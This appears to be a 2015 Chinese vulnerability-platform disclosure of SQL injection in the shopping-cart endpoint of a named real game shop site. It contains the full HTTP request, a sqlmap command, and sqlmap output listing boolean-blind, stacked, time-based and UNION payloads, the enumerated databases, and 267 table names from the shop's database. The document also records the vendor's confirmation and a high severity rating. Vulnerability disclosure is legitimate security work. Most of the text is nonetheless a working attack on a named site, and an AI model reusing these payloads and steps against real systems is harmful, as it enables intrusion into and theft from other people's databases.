2015-12-21: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
什么样的节奏是最呀最摇摆?什么样的歌声才是最开怀?
cookie我删掉了,测试验证的时候可以先登录,然后把cookie辅助到这个请求里,然后再用sqlmap去跑sqlmap.py -r 1.txt --dbs --dbms=mysql --string="ouak6v3z1447067466"
POST http://shop.9you.com/cart/info HTTP/1.1Host: shop.9you.comConnection: keep-aliveContent-Length: 46Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://shop.9you.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://shop.9you.com/cart/indexAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: cart_type=mb&item_key[]=ouak6v3z1447067466*sqlmap identified the following injection points with a total of 41 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND 4709=4709 AND ('tWvx'='tWvx Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: cart_type=mb&item_key[]=ouak6v3z1447067466');(SELECT * FROM (SELECT(SLEEP(5)))QGkB)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND (SELECT * FROM (SELECT(SLEEP(5)))GlAU) AND ('xGKb'='xGKb Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x426970725a4f4a46434a,0x71707a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: PHP 5.3.29back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND 4709=4709 AND ('tWvx'='tWvx Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: cart_type=mb&item_key[]=ouak6v3z1447067466');(SELECT * FROM (SELECT(SLEEP(5)))QGkB)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND (SELECT * FROM (SELECT(SLEEP(5)))GlAU) AND ('xGKb'='xGKb Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x426970725a4f4a46434a,0x71707a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: PHP 5.3.29back-end DBMS: MySQL >= 5.0.0available databases [4]:[*] aushop[*] information_schema[*] mysql[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND 4709=4709 AND ('tWvx'='tWvx Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: cart_type=mb&item_key[]=ouak6v3z1447067466');(SELECT * FROM (SELECT(SLEEP(5)))QGkB)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND (SELECT * FROM (SELECT(SLEEP(5)))GlAU) AND ('xGKb'='xGKb Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x426970725a4f4a46434a,0x71707a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: PHP 5.3.29back-end DBMS: MySQL >= 5.0.0available databases [4]:[*] aushop[*] information_schema[*] mysql[*] testDatabase: aushop[267 tables]+----------------------------+| 120112happy_lovers || 130619_wxbind_award_log || 130929_wabp_log || 131220_baoming_fam_data || 131220_baoming || 140327_vip_lb_badge || 140327_vip_lb_log || 140327_vip_lb || 140404_labachongji_log || 140520_mtlb_log || 140710_yidong_log || 140710_yidong || 140715_wabp_freeback_log || 20141220_repay_log || 20141220_repay || 20141220_vip_badge || 20141220_vip_item_log || 20150720_mtlb_log || 20151204_mtlb_log || 4familybgan || 4familycard || 4familylist || 4familylog || 4familypet || 4familypets || 4familytemp || 4familytguo || 4familyuser || 4magicexp || 4magiclove_log || 4magiclovestar || 4magicpets || 4magicuserinfo || active4_gift || active_02_get_log || active_02_log || active_02_pay_log || active_04_get_log || active_04_log || active_04_pay_log || active_05_get_log || active_05_log || active_05_pay_log || active_06_get_log || active_06_log || active_06_pay_log || active_07_get_log || active_07_log || active_07_pay_log || active_08_get_log || active_08_log || active_08_pay_log || active_10_get_log || active_10_log || active_10_pay_log || active_11_get_log || active_11_log || active_11_pay_log || active_15_get_log || active_15_log || active_15_pay_log || active_badge || active_badge_201503 || active_badge_615 || active_badge_july || active_badge_june || active_badge_yy || active_charts_07_get_log || active_charts_07_log || active_charts_07_pay_log || active_common || active_common_201412 || active_common_log || active_common_log_201412 || active_get_log || active_info || active_item || active_list || active_log || active_ol_get_log || active_ol_log || active_ol_pay_log || active_online || active_online_201503 || active_online_badge || active_online_badge_201503 || active_online_special || active_online_token || active_online_token2 || active_online_token3 || active_pay_log || active_rank || active_ranklist || active_wshg_20150228 || active_ylh_get_log || active_ylh_log || active_ylh_pay_log || active_ylh_vip || admin_log || admin_user || advert || appointments || au_anniversary || au_tenyear_addflower || au_tenyear_cdkey || au_tenyear_draw || au_tenyear_log || au_tenyear_sign || badge_buylog || badge_card || badge_card_log || badge_help_t || badge_info || badge_info_log || badge_info_log_back || badge_money || badge_ranking_list || badge_ranking_log || badgetlog || badgetlog_err || bc_common_log || buylogs || buylogs_luck || buylogs_temp || buylogs_temp2 || buylogs_tqlb || cart_give_info || cart_info || carts || carts_give || carts_mini || check_mysql_status || combine || combine_4647_bak || coupon || cp44trade || ddung_collect || discount_tickets || discount_uselog || family_party_t || faminfo || famitem_buylog || fampet_buylog || famrename || famrenameinfo || feiniu_coupon || fengting || freebuylog || freebuylog_20150310 || freebuylog_refund || freebuylog_refund_log || get_active_common || gift_get_item || gift_log || gift_log2013 || gift_log2014 || gift_log2015 || gift_log_2015 || gift_log_2016 || gift_mb || gift_mb_2011 || gift_mb_2012 || gift_mb_2013 || gift_mb_2013_2 || gift_mb_2014 || gift_mb_2015 || gift_mb_201503 || gift_mb_log || gift_mb_log_2011_12 || gift_mb_log_2013 || gift_mb_log_2014 || gift_shop || gift_shop_2011 || gift_shop_2012 || gift_shop_2013 || gift_shop_2013_1 || gift_shop_2014 || gift_shop_2015 || gift_shop_2016 || gift_test_shop || gift_test_shop_2012 || gift_test_shop_2013_1 || gift_test_shop_2013_2 || gift_test_shop_2013_3 || gift_test_shop_2014_1 || gift_test_shop_2014_2 || gift_test_shop_2014_6 || hiddenword || hope_data || horn_kb || horn_kb_err || horn_money || horn_money_errlog || horn_pool || horn_pool_errlog || horn_rank || horn_rank_log || horn_rank_log_v2 || imageshow_t || items || items_online || items_online_july || items_online_june || items_online_may || labck_roster || labck_vote || lastlogin_allzone_good || lottery || lottery_award || lottery_get_log || lovedata_blacklist || loverheartlog || luckydraw_0401_contact || luckydraw_0401_user_t || magic_buylog || member_badge || mtlb_card_list || mtlb_item_list || nickname_card || nickname_log || old_temp_candies || old_temp_common || old_temp_common_log || online_blacklist || order_detail || order_online || orders || rank_blacklist || rank_game_horn_list || rank_guild_temp || ranking_list || return_20150720 || ring_info || rush_buy_info || rush_buy_items || rush_gift_get_log || rush_gift_pay_log || shop_marquee || skin_log || skin_t || slave_check || temp_candies || temp_common || temp_common_log || tenyear_ring || tk_order_detail || tk_orders || top_buylog || user_band_server || user_fx_protect || user_fx_protect_log || user_lottery || user_lottery_log || vip_badge_active || vip_badge_active_log || vip_card || vip_item_log || vote_card || vote_card_log || wabp_buylog || ylh_common_log || yy_login || yy_login_log || yy_order || yy_user || yzbp_roster || yzbp_vote |+----------------------------+
过滤
危害等级:高
漏洞Rank:20
确认时间:2015-12-21 16:42
非常感谢。
暂无